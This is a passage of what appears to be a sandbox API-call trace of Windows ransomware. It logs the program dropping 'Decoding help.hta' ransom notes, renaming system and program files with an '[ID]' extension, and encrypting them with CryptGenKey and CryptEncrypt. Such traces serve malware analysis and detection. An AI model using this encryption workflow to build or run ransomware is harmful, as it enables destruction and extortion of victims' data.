Shared\\VBA\\VBA7\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.624] lstrcmpiW (lpString1="Decoding help.hta", lpString2="VBE7.DLL") returned -1 [0057.624] lstrlenW (lpString="VBE7.DLL") returned 8 [0057.624] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*" [0057.624] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*") returned 63 [0057.624] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\", lpString2="VBE7.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL" [0057.624] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL" [0057.624] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0057.624] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.596] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbb4 [0061.597] CreateFileMappingA (hFile=0xbb4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xbc4 [0061.597] CryptAcquireContextA (phProv=0xe44fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 614 os_tid = 0xddc [0048.818] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*.*", lpFindFileData=0xf34fd30 | out: lpFindFileData=0xf34fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7516b10, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6711b0 [0049.783] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.783] FindNextFileW (in: hFindFile=0x6711b0, lpFindFileData=0xf34fd30 | out: lpFindFileData=0xf34fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7516b10, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.783] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.783] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.783] FindNextFileW (in: hFindFile=0x6711b0, lpFindFileData=0xf34fd30 | out: lpFindFileData=0xf34fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb22e200, ftCreationTime.dwHighDateTime=0x1c82168, ftLastAccessTime.dwLowDateTime=0x753cc70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbb22e200, ftLastWriteTime.dwHighDateTime=0x1c82168, nFileSizeHigh=0x0, nFileSizeLow=0x38200, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSB1FREN.DLL", cAlternateFileName="")) returned 1 [0050.103] lstrcpyW (in: lpString1=0x24faf2f0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*.*" [0050.103] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*.*") returned 68 [0050.103] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\Decoding help.hta" [0050.103] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\decoding help.hta")) returned 0xffffffff [0050.103] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x564 [0051.181] WriteFile (in: hFile=0x564, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xf34fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xf34fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.012] CloseHandle (hObject=0x564) returned 1 [0055.313] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.145] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSB1FREN.DLL") returned -1 [0058.145] lstrlenW (lpString="MSB1FREN.DLL") returned 12 [0058.145] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*.*" [0058.145] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*.*") returned 68 [0058.145] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\", lpString2="MSB1FREN.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL" [0058.145] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL" [0058.145] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0058.145] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.605] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9dc [0061.605] CreateFileMappingA (hFile=0x9dc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x9cc [0061.605] CryptAcquireContextA (phProv=0xf34fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 615 os_tid = 0xde0 [0048.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*.*", lpFindFileData=0x1275fd30 | out: lpFindFileData=0x1275fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e34f0 [0048.820] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.820] FindNextFileW (in: hFindFile=0x5e34f0, lpFindFileData=0x1275fd30 | out: lpFindFileData=0x1275fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.820] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.820] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.820] FindNextFileW (in: hFindFile=0x5e34f0, lpFindFileData=0x1275fd30 | out: lpFindFileData=0x1275fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0048.820] FindClose (in: hFindFile=0x5e34f0 | out: hFindFile=0x5e34f0) returned 1 Thread: id = 616 os_tid = 0xde4 [0048.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*", lpFindFileData=0x12d9fd30 | out: lpFindFileData=0x12d9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x2578fe30, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da538 [0050.355] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.355] FindNextFileW (in: hFindFile=0x5da538, lpFindFileData=0x12d9fd30 | out: lpFindFileData=0x12d9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x2578fe30, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.355] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.355] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.355] FindNextFileW (in: hFindFile=0x5da538, lpFindFileData=0x12d9fd30 | out: lpFindFileData=0x12d9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2578fe30, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x2578fe30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2578fe30, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0050.357] lstrcpyW (in: lpString1=0x25197a78, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*" [0050.357] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned 55 [0050.357] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\Decoding help.hta" [0050.357] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\decoding help.hta")) returned 0x20 [0050.357] FindNextFileW (in: hFindFile=0x5da538, lpFindFileData=0x12d9fd30 | out: lpFindFileData=0x12d9fd30*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xe0118910, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr0.dat", cAlternateFileName="")) returned 1 [0050.357] lstrcpyW (in: lpString1=0x25197a78, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*" [0050.357] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned 55 [0050.357] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\Decoding help.hta" [0050.357] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\decoding help.hta")) returned 0x20 [0050.357] lstrcmpiW (lpString1="Decoding help.hta", lpString2="qmgr0.dat") returned -1 [0050.357] lstrlenW (lpString="qmgr0.dat") returned 9 [0050.357] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*" [0050.357] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned 55 [0050.357] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\", lpString2="qmgr0.dat" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat" [0050.358] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat" [0050.358] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0050.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0053.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x614 [0054.109] CreateFileMappingA (hFile=0x614, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x2f0 [0054.109] CryptAcquireContextA (in: phProv=0x12d9fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12d9fcec*=0x3449248) returned 1 [0055.202] CryptGenKey (in: hProv=0x3449248, Algid=0x6610, dwFlags=0x1, phKey=0x12d9fce8 | out: phKey=0x12d9fce8*=0x5e2e30) returned 1 [0055.202] CryptExportKey (in: hKey=0x5e2e30, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x12d9fbe4, pdwDataLen=0x12d9fce4 | out: pbData=0x12d9fbe4*, pdwDataLen=0x12d9fce4*=0x2c) returned 1 [0055.202] MapViewOfFile (hFileMappingObject=0x2f0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x30b0000 [0055.734] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x12d9fbe4*, pdwDataLen=0x12d9fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x12d9fbe4*, pdwDataLen=0x12d9fcf8*=0x100) returned 1 [0055.734] CryptEncrypt (in: hKey=0x5e2e30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x30b0000, pdwDataLen=0x12d9fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x30b0000*, pdwDataLen=0x12d9fce4*=0x100000) returned 1 [0055.899] UnmapViewOfFile (lpBaseAddress=0x30b0000) returned 1 [0056.761] CloseHandle (hObject=0x2f0) returned 1 [0056.761] CryptDestroyKey (hKey=0x5e2e30) returned 1 [0056.761] CryptReleaseContext (hProv=0x3449248, dwFlags=0x0) returned 1 [0056.761] SetFilePointerEx (in: hFile=0x614, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.761] WriteFile (in: hFile=0x614, lpBuffer=0x12d9fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x12d9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x12d9fbe4*, lpNumberOfBytesWritten=0x12d9fcf8*=0x100, lpOverlapped=0x0) returned 1 [0058.259] WriteFile (in: hFile=0x614, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x12d9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x12d9fcf8*=0x500, lpOverlapped=0x0) returned 1 [0058.259] CloseHandle (hObject=0x614) returned 1 [0058.259] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.259] FindNextFileW (in: hFindFile=0x5da538, lpFindFileData=0x12d9fd30 | out: lpFindFileData=0x12d9fd30*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xdd404870, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr1.dat", cAlternateFileName="")) returned 1 [0058.259] lstrcpyW (in: lpString1=0x2aa50e98, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*" [0058.259] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned 55 [0058.259] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\Decoding help.hta" [0058.260] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\decoding help.hta")) returned 0x1 [0058.260] lstrcmpiW (lpString1="Decoding help.hta", lpString2="qmgr1.dat") returned -1 [0058.260] lstrlenW (lpString="qmgr1.dat") returned 9 [0058.260] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*" [0058.260] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned 55 [0058.260] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\", lpString2="qmgr1.dat" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat" [0058.260] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat" [0058.260] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0058.260] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.260] FindNextFileW (in: hFindFile=0x5da538, lpFindFileData=0x12d9fd30 | out: lpFindFileData=0x12d9fd30*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xdd404870, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr1.dat", cAlternateFileName="")) returned 0 [0058.260] FindClose (in: hFindFile=0x5da538 | out: hFindFile=0x5da538) returned 1 Thread: id = 617 os_tid = 0xde8 [0048.825] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*", lpFindFileData=0x1315fd30 | out: lpFindFileData=0x1315fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e34f0 [0048.825] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.825] FindNextFileW (in: 